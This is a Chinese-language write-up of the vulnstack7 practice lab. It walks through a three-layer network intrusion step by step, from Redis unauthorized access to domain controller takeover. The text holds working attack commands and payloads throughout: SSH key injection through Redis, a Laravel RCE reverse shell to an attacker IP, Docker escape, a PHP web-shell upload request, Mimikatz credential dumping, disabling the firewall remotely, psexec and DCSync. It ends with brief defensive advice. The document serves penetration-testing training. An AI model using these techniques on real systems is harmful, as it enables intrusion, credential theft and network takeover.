从Redis未授权到域控沦陷:手把手复现红日vulnstack7靶场的三层网络渗透实战
从Redis未授权到域控沦陷:红日vulnstack7靶场三层渗透全解析
在网络安全实战演练中,多层网络环境的渗透测试往往是最能检验攻防能力的场景。红日安全团队推出的vulnstack7靶场,通过精心设计的三层网络架构,完美模拟了企业级内网中可能存在的各种安全风险。本文将从一个攻击者的视角,详细拆解如何从外网Redis未授权访问漏洞入手,逐步突破层层防线,最终拿下域控制器的完整过程。
1. 靶场环境与攻击路径规划
vulnstack7靶场采用典型的企业网络分层架构:
- DMZ区:Ubuntu服务器(Web1)承担对外服务,开放80/81端口
- 第二层网络:Ubuntu(Web2)和Windows 7(PC1)组成业务内网
- 第三层网络:Windows Server 2012(域控)和Windows 7(PC2)构成核心域环境
攻击路径设计遵循"由外到内、由浅入深"的原则:
外网突破 → 内网横向 → 权限维持 → 域控拿下2. 外网突破:Redis未授权访问利用
Redis的6379端口暴露在公网且未设置认证,这是第一个突破口。攻击步骤如下:
密钥生成与注入
ssh-keygen -t rsa (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt cat key.txt | redis-cli -h 192.168.1.6 -x set xxxRedis配置篡改
config set dir /root/.ssh config set dbfilename authorized_keys saveSSH免密登录
ssh -i id_rsa root@192.168.1.6
成功获取Web1权限后,通过分析Nginx配置发现关键信息:
server { listen 80; server_name localhost; proxy_pass https://whoamianony.top; } server { listen 81; server_name localhost; proxy_pass http://192.168.52.20; }3. 内网渗透:Laravel RCE与Docker逃逸
3.1 Laravel远程代码执行
81端口对应的Laravel v8.29.0存在CVE-2021-3129漏洞,使用公开EXP获取Webshell:
# 生成恶意Payload python laravel_exp.py -t http://192.168.1.6:81 -c "bash -c 'exec bash -i &>/dev/tcp/192.168.1.9/8888 <&1'"通过哥斯拉Godzilla连接Webshell,发现环境为Docker容器。
3.2 Docker容器提权
SUID文件查找
find / -perm -u=s -type f 2>/dev/null环境变量劫持
echo "/bin/bash" > /tmp/ps chmod 777 /tmp/ps export PATH=/tmp:$PATH ./shell # 触发SUID程序调用被篡改的ps
3.3 特权模式逃逸
利用Docker特权模式挂载宿主机磁盘:
mkdir /gz mount /dev/sda1 /gz echo 'ssh-rsa AAA...' > /gz/home/ubuntu/.ssh/authorized_keys通过SSH登录宿主机后,利用CVE-2021-3493提权:
// exploit.c 编译执行 __attribute__((constructor)) void payload() { setuid(0); system("/bin/bash"); }4. 横向移动:多层代理与通达OA漏洞利用
4.1 网络拓扑探测
通过已控主机发现内网结构:
| IP段 | 主要主机 | 服务/角色 |
|---|---|---|
| 192.168.52.0 | 192.168.52.20 (Web2) | Docker服务 |
| 192.168.52.0 | 192.168.52.30 (PC1) | 通达OA系统 |
| 192.168.93.0 | 192.168.93.30 (DC) | 域控制器 |
| 192.168.93.0 | 192.168.93.40 (PC2) | 域成员主机 |
4.2 EarthWorm多层代理搭建
攻击机监听
./ew_for_linux64 -s rcsocks -l 1080 -e 1234Web1节点中转
nohup ./ew_for_linux64 -s rssocks -d 192.168.1.9 -e 1234Proxychains配置
# /etc/proxychains4.conf socks5 127.0.0.1 1080
4.3 通达OA漏洞利用
利用V11.3版本的文件上传漏洞:
POST /ispirit/im/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; name="ATTACHMENT"; filename="shell.jpg" Content-Type: image/jpeg <?php system($_REQUEST['cmd']);?>文件包含触发RCE:
POST /ispirit/interface/gateway.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../attach/im/2206/shell.jpg"}&cmd=whoami5. 域控攻陷:凭证窃取与权限提升
5.1 凭证获取技术
Mimikatz提取哈希
privilege::debug sekurlsa::logonpasswords获取的凭证信息
用户名 密码 角色 Administrator Whoami2021 域管理员 bunny Bunny2021 域用户 moretz Moretz2021 域用户
5.2 跨网段路由配置
三层网络代理链
# 攻击机 ./ew_for_linux64 -s lcx_listen -l 1090 -e 1235 # PC1 ew_for_Win.exe -s ssocksd -l 999 # Web1 ./ew_for_linux64 -s lcx_slave -d 192.168.1.7 -e 1235 -f 192.168.52.30 -g 999防火墙绕过技巧
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator" sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.93.30 start unablefirewall
5.3 最终域控接管
使用psexec模块进行横向移动:
use exploit/windows/smb/psexec set rhosts 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 set payload windows/meterpreter/bind_tcp exploit成功获取域控权限后,可通过CS(Cobalt Strike)进行持久化控制:
# 创建SMB Beacon beacon> powershell-import PowerView.ps1 beacon> steal_token <pid> beacon> dcsync whoamianony.org administrator6. 防御建议与思考
在实际渗透过程中,每一步突破都对应着防御体系的缺失。从技术角度看,企业网络至少需要:
边界防护
- Redis等中间件禁止暴露公网
- 严格ACL策略限制非必要端口
内网隔离
- VLAN划分与网络分段
- 跳板机双因素认证
权限控制
- 最小权限原则
- 定期凭证轮换
漏洞管理
- 及时修补已知漏洞
- Web应用防火墙部署
这个靶场演练最值得借鉴的是攻击者的"迂回战术"——当直接攻击域控受阻时,转而控制其下属主机,再通过凭证窃取实现最终目标。这种层层递进的渗透思路,正是现实攻防中最常见的场景。